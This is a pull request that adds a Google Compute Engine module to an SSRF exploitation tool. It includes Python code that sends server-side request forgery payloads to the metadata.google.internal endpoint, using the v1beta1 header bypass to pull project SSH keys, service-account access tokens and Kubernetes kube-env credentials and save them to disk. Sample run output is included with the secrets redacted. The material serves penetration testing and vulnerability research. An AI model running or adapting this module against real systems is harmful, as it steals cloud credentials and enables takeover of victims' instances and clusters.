### PR TITLE
Suport GCE Metadata 

### DIFF
--- a/modules/gce.py
+++ b/modules/gce.py
@@ -1,0 +1,53 @@
+from core.utils import *
+import logging
+import os
+
+name          = "gce"
+description   = "Access sensitive data from GCE"
+author        = "mrtc0"
+documentation = [
+    "https://cloud.google.com/compute/docs/storing-retrieving-metadata",
+    "https://hackerone.com/reports/341876",
+    "https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/"
+]
+
+class exploit():
+    endpoints = set()
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+        self.add_endpoints()
+
+        r = requester.do_request(args.param, "")
+        if r != None:
+            default = r.text
+
+            # Create directory to store files
+            directory = requester.host
+            if not os.path.exists(directory):
+                os.makedirs(directory)
+
+            for endpoint in self.endpoints:
+                payload = wrapper_http(endpoint[1], endpoint[0] , "80")
+                r  = requester.do_request(args.param, payload)
+                diff = diff_text(r.text, default)
+                if diff != "":
+
+                    # Display diff between default and ssrf request
+                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    print(diff)
+
+                    # Write diff to a file
+                    filename = endpoint[1].split('/')[-1]
+                    if filename == "":
+                        filename = endpoint[1].split('/')[-2:-1][0]
+
+                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    with open(directory + "/" + filename, 'w') as f:
+                        f.write(diff)
+
+
+    def add_endpoints(self):
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json") )
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/service-accounts/default/token") )
+        self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/kube-env?alt=json") )


### PR DESCRIPTION
GCE (Google Compute Engine) also has metadata like AWS.

In GCE, can obtain information on the project by accessing it from inside the instance to the endpoint http: //metadata.google.internal/computeMetadata/v1/project/.

Normally, need to give a `Metadata-Flavor` header, but the endpoint of v1beta1 does not need a header, so it can be bypassed.

This problem also occurred in Shopify.
https://hackerone.com/reports/341876

This pull request supports a module that obtains 3 sensitive data from GCE's metadata.

### Get SSH Public Key

- http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json

```json
mrtc0:ssh-rsa AAAABXXXXXXXXXXXXXXXXXXXXXXXXgoogle-ssh {"userName":"mrtc0@ssrf.in","expireOn":"2018-09-05T07:16:40+0000"}
...
```

### Get Access Token

- http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token

```json
{"access_token":"XXXXXXXXXXXXXXXXXXX","expires_in":3394,"token_type":"Bearer"}
```

### SSH Private key and certificate for accessing Kubernetes

- http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json

```
"ALLOCATE_NODE_CIDRS: \"true\"\nCA_CERT: XXXXXX...
```

## Example of execution

```bash
$ python ssrfmap.py -r data/request.txt -p url -m gce
[INFO]:Module 'gce' launched !
[INFO]:Reading file : http://metadata.google.internal:80/computeMetadata/v1beta1/instance/service-accounts/default/token
{"access_token":"<Here includes access tokens>","expires_in":3581,"token_type":"Bearer"}

[INFO]:Writing file : http://metadata.google.internal:80/computeMetadata/v1beta1/instance/service-accounts/default/token to XX.XX.XX.XX:5000/token
[INFO]:Reading file : http://metadata.google.internal:80/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
"mrtc0_py:ssh-rsa <Here includes SSH Public Key> google-ssh {\"userName\":\"mrtc0@ssrf.in\",\"expireOn\":\"2018-11-25T13:20:20+0000\"}\nmrtc0:ecdsa-sha2-nistp256 <Here includes SSH Public Key> google-ssh {\"userName\":\"mrtc0@ssrf.in\",\"expireOn\":\"2018-11-25T13:20:16+0000\"}\n"

[INFO]:Writing file : http://metadata.google.internal:80/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json to XX.XX.XX.XX:5000/ssh-keys?alt=json
"ALLOCATE_NODE_CIDRS: \"true\"\nCA_CERT: <Here includes CA>

[INFO]:Writing file : http://metadata.google.internal:80/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json to XX.XX.XX.XX:5000/kube-env?alt=json
```

## Reference

- https://cloud.google.com/compute/docs/storing-retrieving-metadata
- https://hackerone.com/reports/341876
- https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/